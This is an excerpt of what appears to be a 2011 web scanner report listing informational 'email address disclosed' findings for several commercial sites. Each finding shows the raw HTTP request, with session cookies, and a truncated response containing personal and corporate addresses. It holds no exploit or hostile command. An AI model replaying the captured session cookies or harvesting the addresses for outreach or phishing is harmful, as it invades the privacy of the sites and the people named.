Web Design and Programming by 352 Media Group..
422 SW 140th Terrace
Newberry, Fl 32669
(877) 352-Media
sales@352media.com
www.352media.com
-->
...[SNIP]...
<a href="mailto:mandersen@fastteks.com">mandersen@fastteks.com</a>
...[SNIP]...
<a class="emailLink" href="mailto:info@fastteks.com">
info@fastteks.com</a>
...[SNIP]...

23.52. http://www.fastteks.com/TechSolutions/Default.aspx  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.fastteks.com
Path:   /TechSolutions/Default.aspx

Issue detail

The following email addresses were disclosed in the response:

Request

GET /TechSolutions/Default.aspx HTTP/1.1
Host: www.fastteks.com
Proxy-Connection: keep-alive
Referer: http://www.fastteks.com/TechSolutions/About-Us.aspx
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: X-Mapping-jgcdejoi=6580DFD6651FCAA5171157C96E4BB448; .ASPXANONYMOUS=_eAUs758zAEkAAAANjdjMWRjYjktMWFjYy00MTAxLThkNzItMjgxMzBiMTMwNGUw8ijUH0Cv7Pat0Vj-1z-ShfMdhM01; ASP.NET_SessionId=2exsmk55wscz5545na1jov45; __utma=226585354.596719106.1311091190.1311091190.1311091190.1; __utmb=226585354.5.10.1311091190; __utmc=226585354; __utmz=226585354.1311091190.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none)

Response

HTTP/1.1 200 OK
Date: Tue, 19 Jul 2011 16:03:47 GMT
Server: Microsoft-IIS/7.5
Cache-Control: private
Content-Type: text/html; charset=utf-8
Vary: Accept-Encoding
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Content-Length: 382448


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head><meta http-equiv="X-UA
...[SNIP]...
<!--
Web Design and Programming by 352 Media Group..
422 SW 140th Terrace
Newberry, Fl 32669
(877) 352-Media
sales@352media.com
www.352media.com
-->
...[SNIP]...
<a href="mailto:mandersen@fastteks.com">mandersen@fastteks.com</a>
...[SNIP]...
<a href="mailto:mandersen@fastteks.com">
...[SNIP]...

23.53. http://www.fastteks.com/TechSolutions/News.aspx  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.fastteks.com
Path:   /TechSolutions/News.aspx

Issue detail

The following email addresses were disclosed in the response:

Request

GET /TechSolutions/News.aspx HTTP/1.1
Host: www.fastteks.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: X-Mapping-jgcdejoi=6580DFD6651FCAA5171157C96E4BB448; .ASPXANONYMOUS=_eAUs758zAEkAAAANjdjMWRjYjktMWFjYy00MTAxLThkNzItMjgxMzBiMTMwNGUw8ijUH0Cv7Pat0Vj-1z-ShfMdhM01; ASP.NET_SessionId=2exsmk55wscz5545na1jov45; __utma=226585354.596719106.1311091190.1311091190.1311091190.1; __utmb=226585354.4.10.1311091190; __utmc=226585354; __utmz=226585354.1311091190.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none)

Response

HTTP/1.1 200 OK
Date: Tue, 19 Jul 2011 16:03:42 GMT
Server: Microsoft-IIS/7.5
Cache-Control: private
Content-Type: text/html; charset=utf-8
Vary: Accept-Encoding
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Content-Length: 399254


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head><meta http-equiv="X-UA
...[SNIP]...
<!--
Web Design and Programming by 352 Media Group..
422 SW 140th Terrace
Newberry, Fl 32669
(877) 352-Media
sales@352media.com
www.352media.com
-->
...[SNIP]...
<a href="mailto:mandersen@fastteks.com">mandersen@fastteks.com</a>
...[SNIP]...

23.54. http://www.fastteks.com/TechSolutions/Services.aspx  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.fastteks.com
Path:   /TechSolutions/Services.aspx

Issue detail

The following email addresses were disclosed in the response:

Request

GET /TechSolutions/Services.aspx HTTP/1.1
Host: www.fastteks.com
Proxy-Connection: keep-alive
Referer: http://www.fastteks.com/techsolutions/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: X-Mapping-jgcdejoi=6580DFD6651FCAA5171157C96E4BB448; .ASPXANONYMOUS=_eAUs758zAEkAAAANjdjMWRjYjktMWFjYy00MTAxLThkNzItMjgxMzBiMTMwNGUw8ijUH0Cv7Pat0Vj-1z-ShfMdhM01; ASP.NET_SessionId=2exsmk55wscz5545na1jov45; __utma=226585354.596719106.1311091190.1311091190.1311091190.1; __utmb=226585354.1.10.1311091190; __utmc=226585354; __utmz=226585354.1311091190.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none)

Response

HTTP/1.1 200 OK
Date: Tue, 19 Jul 2011 16:00:31 GMT
Server: Microsoft-IIS/7.5
Cache-Control: private
Content-Type: text/html; charset=utf-8
Vary: Accept-Encoding
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Content-Length: 362186


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head><meta http-equiv="X-UA
...[SNIP]...
<!--
Web Design and Programming by 352 Media Group..
422 SW 140th Terrace
Newberry, Fl 32669
(877) 352-Media
sales@352media.com
www.352media.com
-->
...[SNIP]...
<a href="mailto:mandersen@fastteks.com">mandersen@fastteks.com</a>
...[SNIP]...
<A href="mailto:mandersen@fastteks.com">
...[SNIP]...
<A href="mailto:mandersen@fastteks.com">
...[SNIP]...

23.55. http://www.fastteks.com/techsolutions/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.fastteks.com
Path:   /techsolutions/

Issue detail

The following email addresses were disclosed in the response:

Request

GET /techsolutions/ HTTP/1.1
Host: www.fastteks.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: X-Mapping-jgcdejoi=6580DFD6651FCAA5171157C96E4BB448

Response

HTTP/1.1 200 OK
Date: Tue, 19 Jul 2011 15:59:39 GMT
Server: Microsoft-IIS/7.5
Cache-Control: private
Content-Type: text/html; charset=utf-8
Vary: Accept-Encoding
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Content-Length: 382448


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head><meta http-equiv="X-UA
...[SNIP]...
<!--
Web Design and Programming by 352 Media Group..
422 SW 140th Terrace
Newberry, Fl 32669
(877) 352-Media
sales@352media.com
www.352media.com
-->
...[SNIP]...
<a href="mailto:mandersen@fastteks.com">mandersen@fastteks.com</a>
...[SNIP]...
<a href="mailto:mandersen@fastteks.com">
...[SNIP]...

23.56. http://www.gamestop.com/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.gamestop.com
Path:   /

Issue detail

The following email address was disclosed in the response:

Request

GET / HTTP/1.1
Host: www.gamestop.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
X-Cnection: close
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
COMMERCE-SERVER-SOFTWARE: Microsoft Commerce Server, Enterprise Edition
Cache-Control: private
Content-Type: text/html; charset=utf-8
Date: Tue, 19 Jul 2011 16:02:25 GMT
Connection: close
Vary: Accept-Encoding
Connection: Transfer-Encoding
Set-Cookie: LocaleCookie=en-us; expires=Mon, 19-Jul-2021 16:02:25 GMT; path=/
Set-Cookie: CampaignHistory=3375,3375,4265,4151,4287,4300,3852,3362,4228,4226,4227,3383,3375,3375,4265,4151,4287,4300,3852,3362,4228,4227,4226,3383; path=/
Set-Cookie: CactusState=V=1; path=/
Content-Length: 317495


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" >
<head><meta http-equiv="Con
...[SNIP]...
entPlaceHolder_dynamicContent_ctl00_RepeaterCenterColumnLayouts_ctl01_CenterColumnPlaceHolder_ctl00_ctl00_ctl09_StackPlaceHolder_ctl00_ctl00_ctl00_StandardPlaceHolder_ctl00_txtNewsletterSignup" value="yourname@address.com" onfocus="this.value=''" class="mdmField" />
...[SNIP]...

23.57. http://www.googlelabs.com/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.googlelabs.com
Path:   /

Issue detail

The following email address was disclosed in the response:

Request

GET / HTTP/1.1
Host: www.googlelabs.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=utf-8
Cache-Control: no-cache
Expires: Fri, 01 Jan 1990 00:00:00 GMT
Pragma: no-cache
Content-Language: en-us
Date: Tue, 19 Jul 2011 20:49:41 GMT
Server: Google Frontend
Content-Length: 47646

<!DOCTYPE html>
<html lang="en-US">

<head>
<script type="text/javascript">(function(){function a(c){this.t={};this.tick=function(c,e,b){b=b!=void 0?b:(new Date).getTime();this.t[c]=[b,e]};thi
...[SNIP]...
Application intended for chat (IM) users, including users using chat
clients on low-end phones, allowing them to answer simple web queries
from the context of their chat application. First invite guru@googlelabs.com to chat, and then
send queries via your chat client. Categories supported include
weather, translation, unit and currency conversions, and sports
scores. Send &quot;help&quot; for more information.
...[SNIP]...

23.58. http://www.intelex.com/landing/Quality_Nonconformance_and_Product_Defect_Tracking_Software-83campaign.aspx  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.intelex.com
Path:   /landing/Quality_Nonconformance_and_Product_Defect_Tracking_Software-83campaign.aspx

Issue detail

The following email address was disclosed in the response:

Request

GET /landing/Quality_Nonconformance_and_Product_Defect_Tracking_Software-83campaign.aspx?_kk=defect%20tracking%20software&_kt=482c9585-bb4d-4f18-a618-06cac501c541&gclid=CMLoqZDNjaoCFYaD5QodbQ3F0w HTTP/1.1
Host: www.intelex.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Tue, 19 Jul 2011 14:20:43 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 4.0.30319
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 98253


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head><meta http-equiv="cont
...[SNIP]...
<a href="mailto:intelex@intelex.com" style="text-decoration: none;">intelex@intelex.com</a>
...[SNIP]...

23.59. http://www.intelex.com/landing/~/script/highslide/highslide.css  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.intelex.com
Path:   /landing/~/script/highslide/highslide.css

Issue detail

The following email address was disclosed in the response:

Request

GET /landing/~/script/highslide/highslide.css HTTP/1.1
Host: www.intelex.com
Proxy-Connection: keep-alive
Referer: http://www.intelex.com/landing/Quality_Nonconformance_and_Product_Defect_Tracking_Software-83campaign.aspx?_kk=defect%20tracking%20software&_kt=482c9585-bb4d-4f18-a618-06cac501c541&gclid=CMLoqZDNjaoCFYaD5QodbQ3F0w
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: text/css,*/*;q=0.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASP.NET_SessionId=gflees54rii1f3o3ejpcx3m0

Response

HTTP/1.1 200 OK
Date: Tue, 19 Jul 2011 14:20:43 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 4.0.30319
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 34055


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head><meta http-equiv="cont
...[SNIP]...
<a href="mailto:intelex@intelex.com" style="text-decoration: none;">intelex@intelex.com</a>
...[SNIP]...

23.60. http://www.linode.com/faq.cfm  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.linode.com
Path:   /faq.cfm

Issue detail

The following email address was disclosed in the response:

Request

GET /faq.cfm HTTP/1.1
Host: www.linode.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://blog.linode.com/2011/07/13/introducing-nodebalancer/
Cookie: __utma=237427869.559622143.1311085869.1311085869.1311085869.1; __utmb=237427869.1.10.1311085869; __utmc=237427869; __utmz=237427869.1311085869.1.1.utmcsr=fakereferrerdominator.com|utmccn=(referral)|utmcmd=referral|utmcct=/referrerPathName

Response

HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Tue, 19 Jul 2011 14:31:48 GMT
Content-Type: text/html; charset=UTF-8
Connection: keep-alive
Content-Length: 15122

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html lang="en"><head>
<title>Linode - faq</title>
<meta http-equiv="content-type" content="text/html;charset=iso-8859-1">
<meta name="d
...[SNIP]...
<a href="mailto:service@linode.com">
...[SNIP]...

23.61. http://www.livedrive.com/Scripts/PreloadImages.js  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.livedrive.com
Path:   /Scripts/PreloadImages.js

Issue detail

The following email address was disclosed in the response:

Request

GET /Scripts/PreloadImages.js HTTP/1.1
Host: www.livedrive.com
Proxy-Connection: keep-alive
Referer: http://www.livedrive.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: tid=; __utmz=9305512.1308880525.1.1.utmcsr=livedrive.com|utmccn=(referral)|utmcmd=referral|utmcct=/Login; __utma=9305512.1214018352.1308880525.1308880525.1308880525.1; ASP.NET_SessionId=q5aztuic5mnla0v34ds15w55; market=US

Response

HTTP/1.1 200 OK
Content-Type: application/x-javascript
Last-Modified: Mon, 23 May 2011 08:27:36 GMT
Accept-Ranges: bytes
ETag: "0ce452319cc1:0"
Vary: Accept-Encoding
Server: Microsoft-IIS/7.5
X-Powered-By: ASP.NET
X-Served-By: 103
Date: Tue, 19 Jul 2011 12:24:15 GMT
Connection: close
Content-Length: 7274

.../**
* jQuery-Plugin "preloadCssImages"
* by Scott Jehl, scott@filamentgroup.com
* http://www.filamentgroup.com
* reference article: http://www.filamentgroup.com/lab/update_automatically_preload_images_from_css_with_jquery/
* demo page: http://www.filamentgroup.com/examples/pre
...[SNIP]...

23.62. http://www.livedrive.com/Scripts/typeface.js  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.livedrive.com
Path:   /Scripts/typeface.js

Issue detail

The following email address was disclosed in the response:

Request

GET /Scripts/typeface.js HTTP/1.1
Host: www.livedrive.com
Proxy-Connection: keep-alive
Referer: http://www.livedrive.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: tid=; __utmz=9305512.1308880525.1.1.utmcsr=livedrive.com|utmccn=(referral)|utmcmd=referral|utmcct=/Login; __utma=9305512.1214018352.1308880525.1308880525.1308880525.1; ASP.NET_SessionId=q5aztuic5mnla0v34ds15w55; market=US

Response

HTTP/1.1 200 OK
Content-Type: application/x-javascript
Last-Modified: Mon, 23 May 2011 08:27:36 GMT
Accept-Ranges: bytes
ETag: "0ce452319cc1:0"
Vary: Accept-Encoding
Server: Microsoft-IIS/7.5
X-Powered-By: ASP.NET
X-Served-By: 101
Date: Tue, 19 Jul 2011 12:22:36 GMT
Connection: close
Content-Length: 33463

.../*****************************************************************

typeface.js, version 0.15 | typefacejs.neocracy.org

Copyright (c) 2008 - 2009, David Chester davidchester@gmx.net

Permission is hereby granted, free of charge, to any person
obtaining a copy of this software and associated documentation
files (the "Software"), to deal in the Software without
restriction, i
...[SNIP]...

23.63. http://www.mavitunasecurity.com/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.mavitunasecurity.com
Path:   /

Issue detail

The following email address was disclosed in the response:

Request

GET / HTTP/1.1
Host: www.mavitunasecurity.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 11213
Content-Type: text/html; charset=utf-8
X-Powered-By: ASP.NET
Date: Tue, 19 Jul 2011 15:39:25 GMT


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
   <head><title>
   N
...[SNIP]...
<a href="mailto:contact@mavitunasecurity.com">contact@mavitunasecurity.com</a>
...[SNIP]...

23.64. http://www.mookie1.com/contact.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.mookie1.com
Path:   /contact.php

Issue detail

The following email address was disclosed in the response:

Request

GET /contact.php HTTP/1.1
Host: www.mookie1.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.mookie1.com/home.php
Cookie: OAX=rcHW801Sn9AACaXG; id=633324155481331; NSC_xxx_qppm_iuuq=ffffffff0949011c45525d5f4f58455e445a4a423660; s_cc=true; s_sq=247oasgendev%3D%2526pid%253Dwe%2526pidt%253D1%2526oid%253Dhttp%25253A//www.mookie1.com/contact.php%2526ot%253DA; OAS_SC1=1311100945269; session=1311100939|1311100939

Response

HTTP/1.1 200 OK
Date: Tue, 19 Jul 2011 18:42:46 GMT
Server: Apache
X-Powered-By: PHP/5.1.6
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Connection: close
Content-Type: text/html; charset=UTF-8
Cache-Control: private
Content-Length: 8578

<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1" />
<meta name="keywords" content="The MIG, Media Innovation, Media Innovat
...[SNIP]...
<a href="mailto:info@themig.com?subject=Media Innovation Group inquiry">info@themig.com</a>
...[SNIP]...

23.65. http://www.netlogiq.ro/js/jquery.emptyOnFocus.js  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.netlogiq.ro
Path:   /js/jquery.emptyOnFocus.js

Issue detail

The following email address was disclosed in the response:

Request

GET /js/jquery.emptyOnFocus.js HTTP/1.1
Host: www.netlogiq.ro
Proxy-Connection: keep-alive
Referer: http://www.netlogiq.ro/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASP.NET_SessionId=rlrppqzm2x1g1e45vesnu245

Response

HTTP/1.1 200 OK
Content-Type: application/x-javascript
Last-Modified: Thu, 24 Jul 2008 09:23:50 GMT
Accept-Ranges: bytes
ETag: "0d765fb6eedc81:0"
Server: Microsoft-IIS/7.0
X-Powered-By: ASP.NET
Date: Tue, 19 Jul 2011 17:40:35 GMT
Content-Length: 1271

/*
* @author Andrei Eftimie
* @email andrei.eftimie@netlogiq.ro
* @copyright (c) Netlogiq
* @web http://www.netlogiq.ro
* http://www.netlogiq.com
*
* Required Markup
* ---------------
* <div class="div">
...[SNIP]...

23.66. http://www.netlogiq.ro/js/jquery.hoverIntent.js  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.netlogiq.ro
Path:   /js/jquery.hoverIntent.js

Issue detail

The following email address was disclosed in the response:

Request

GET /js/jquery.hoverIntent.js HTTP/1.1
Host: www.netlogiq.ro
Proxy-Connection: keep-alive
Referer: http://www.netlogiq.ro/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASP.NET_SessionId=rlrppqzm2x1g1e45vesnu245

Response

HTTP/1.1 200 OK
Content-Type: application/x-javascript
Last-Modified: Mon, 05 May 2008 09:12:42 GMT
Accept-Ranges: bytes
ETag: "021312c90aec81:0"
Server: Microsoft-IIS/7.0
X-Powered-By: ASP.NET
Date: Tue, 19 Jul 2011 17:40:35 GMT
Content-Length: 1609

.../**
* hoverIntent r5 // 2007.03.27 // jQuery 1.1.2+
* <http://cherne.net/brian/resources/jquery.hoverIntent.html>
*
* @param f onMouseOver function || An object with configuration options
* @par
...[SNIP]...
<brian@cherne.net>
...[SNIP]...

23.67. http://www.nne.aaa.com/_Layouts/ACSC.MasterMenu.jQuery/jquery.bgiframe.js  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.nne.aaa.com
Path:   /_Layouts/ACSC.MasterMenu.jQuery/jquery.bgiframe.js

Issue detail

The following email address was disclosed in the response:

Request

GET /_Layouts/ACSC.MasterMenu.jQuery/jquery.bgiframe.js HTTP/1.1
Host: www.nne.aaa.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.nne.aaa.com/en-nne/Pages/Home.aspx?zip=05672&referer=www.aaa.com
Cookie: zipcode=05672|AAA|36; acezipcode=36|AAA|05672

Response

HTTP/1.1 200 OK
Cache-Control: max-age=31536000
Content-Length: 4879
Content-Type: application/x-javascript
Content-Location: http://www.nne.aaa.com/_Layouts/ACSC.MasterMenu.jQuery/jquery.bgiframe.js
Last-Modified: Fri, 17 Jun 2011 11:16:23 GMT
Accept-Ranges: bytes
ETag: "6d28cfedf2ccc1:5897"
Server: Microsoft-IIS/6.0
ACSC: WEB04
X-Powered-By: ASP.NET
Date: Tue, 19 Jul 2011 19:04:25 GMT
Vary: Accept-Encoding, User-Agent
Connection: Keep-Alive

/* Copyright (c) 2006 Brandon Aaron (http://brandonaaron.net)
* Dual licensed under the MIT (http://www.opensource.org/licenses/mit-license.php)
* and GPL (http://www.opensource.org/licenses/gpl-li
...[SNIP]...
ided so that one could change
*        the src of the iframe to whatever they need.
*        Default: "javascript:false;"
*
* @name bgiframe
* @type jQuery
* @cat Plugins/bgiframe
* @author Brandon Aaron (brandon.aaron@gmail.com || http://brandonaaron.net)
*/
$.fn.bgIframe = $.fn.bgiframe = function(s) {
   // This is only for IE6
   if ( $.browser.msie && /6.0/.test(navigator.userAgent) ) {
       s = $.extend({
           top : 'auto',
...[SNIP]...

23.68. http://www.nne.aaa.com/style%20library/js/tracking/sitecatalyst_scode.js  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.nne.aaa.com
Path:   /style%20library/js/tracking/sitecatalyst_scode.js

Issue detail

The following email address was disclosed in the response:

Request

GET /style%20library/js/tracking/sitecatalyst_scode.js HTTP/1.1
Host: www.nne.aaa.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.nne.aaa.com/en-nne/Pages/Home.aspx?zip=05672&referer=www.aaa.com
Cookie: zipcode=05672|AAA|36; acezipcode=36|AAA|05672

Response

HTTP/1.1 200 OK
Date: Tue, 19 Jul 2011 19:04:29 GMT
Server: Microsoft-IIS/6.0
ACSC: WEB04
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Cache-Control: public, max-age=3600
ETag: "{F2BD07B6-4347-4292-9586-6ADD471130EE},58pub"
Content-Type: application/x-javascript
Vary: Accept-Encoding, User-Agent
Content-Length: 37500

.../* ACSC support code for SiteCatalyst version H.20.3.
   Usage:
   1.reference site catalyst js file at /style%20library/js/tracking/sitecatalyst_scode.js
   2.define an anonymous javascript object f
...[SNIP]...
=s.mr($C,(vt@tt`Zvt)`fs.hav()+q+(qs?qs:s.rq(^5)),0,id,ta);qs`g;"
+"`Rm('t')`5s.p_r)s.p_r(`I`a`g}^I(qs);^Q`u($3;`j$3`c^1,`G$O1',vb`I@M=^G=s.`Q`r=s.`Q^2=`H`m`g`5s.pg)`H^w@M=`H^weo=`H^w`Q`r=`H^w`Q^2`g`5!id@Vs.tc^ztc=1;s.flush`U()}`4#7`Ctl`0o,t,n,vo`2;s.@M=$Go`I`Q^2=t"
+";s.`Q`r=n;s.t($3}`5pg){`H^wco`0o){`P^s\"_\",1,$8`4$Go)`Cwd^wgs`0u@v`P^sun,1,$8`4s.t()`Cwd^wdc`0u@v`P^sun,$8`4s.t()}}@8=(`H`M`k`9`3'@Os^y0`Id
...[SNIP]...

23.69. http://www.rallydev.com/js/jquery.colorbox-min.js  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.rallydev.com
Path:   /js/jquery.colorbox-min.js

Issue detail

The following email address was disclosed in the response:

Request

